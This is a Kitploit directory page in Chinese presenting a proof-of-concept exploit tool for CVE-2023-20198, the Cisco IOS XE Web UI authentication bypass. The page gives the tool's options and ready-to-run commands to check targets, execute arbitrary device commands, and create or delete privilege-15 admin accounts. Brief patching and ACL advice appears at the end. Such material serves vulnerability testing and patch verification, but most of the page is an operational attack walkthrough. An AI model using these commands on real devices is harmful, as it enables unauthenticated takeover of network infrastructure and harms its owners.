Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-20198-Exploit — CVE-2023-20198 的概念验证漏洞利用程序,这是一个影响 Cisco IOS XE Web UI 的身份验证绕过漏洞。 | Kitploit
工具/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

CVE-2023-20198 的概念验证漏洞利用程序,这是一个影响 Cisco IOS XE Web UI 的身份验证绕过漏洞。

查看仓库
66个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cisco IOS XE 身份验证绕过(CVE-2023-20198)

此仓库包含针对 CVE-2023-20198 的概念验证(PoC)漏洞利用程序,该漏洞是影响 Cisco IOS XE Web UI 的身份验证绕过漏洞。

该漏洞允许未认证攻击者通过精心构造的 SOAP 请求在受影响的 Cisco 设备上执行任意命令,可能导致设备完全失陷,包括远程命令执行以及创建/删除管理用户。

漏洞概述

  • CVE:CVE-2023-20198

  • 受影响产品:Cisco IOS XE(Web UI / WSMA 接口)

  • 影响:

    • 身份验证绕过
    • 远程命令执行(RCE)
    • 未授权创建用户
    • 未授权删除用户
  • 攻击向量:网络(HTTP/HTTPS)

  • 所需权限:无(未认证)

该漏洞是由于 Web Services Management Agent(WSMA) 端点对身份验证处理不当所致,攻击者可利用精心构造的 HTTP 请求绕过身份验证。

环境要求

  • Python 3.x
  • requests
  • colorama

安装依赖:

root@kitploit:~
pip install -r requirements.txt

使用方法

root@kitploit:~
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Cisco IOS XE Device
  -c, --check           Check if the Target is vulnerable to CVE-2023-20198
  -C CMD, --cmd CMD     Cisco IOS XE Command to Execute
  -a, --add             Add New Username and Password
  -d, --delete          Delete existing User
  -u USERNAME, --username USERNAME
                        Username for Account Creation
  -p PASSWORD, --password PASSWORD
                        Password for Account Creation (Random Password Generated if not Provided)

Usage

命令行选项

漏洞检测

检查目标是否存在漏洞:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -c

Vulnerability Check

如果存在漏洞,该工具将自动检测可利用的 WSMA 端点并显示设备详细信息。

远程命令执行

在受影响设备上执行命令:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"

示例:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

Exploit

添加管理用户

创建一个新的特权级别 15 的管理用户:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

Account Creation

如果未提供密码,脚本将自动生成随机安全密码。

访问 Web 界面

使用新创建的账户,您可以访问设备的 Web UI

Web UI

删除现有用户

删除现有用户:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

Account Deletion

检测与缓解措施

  • 将 Cisco IOS XE 升级到最新补丁版本

  • 如非必要,禁用 Web UI:

    root@kitploit:~
    no ip http server
    no ip http secure-server
    
  • 通过 ACL 限制管理访问

参考

  • Cisco 安全公告 — CVE-2023-20198
  • NVD:CVE-2023-20198
  • Cisco IOS XE WSMA 文档
  • 安全研究社区报告
下载工具
选项说明
-t, --target目标 Cisco IOS XE 设备(必需)
-c, --check检查目标是否存在漏洞
-C, --cmd执行 Cisco IOS XE 命令
-a, --add添加新的管理用户
-d, --delete删除现有用户
-u, --username用于创建/删除账户的用户名
-p, --password新账户的密码(未提供时随机生成)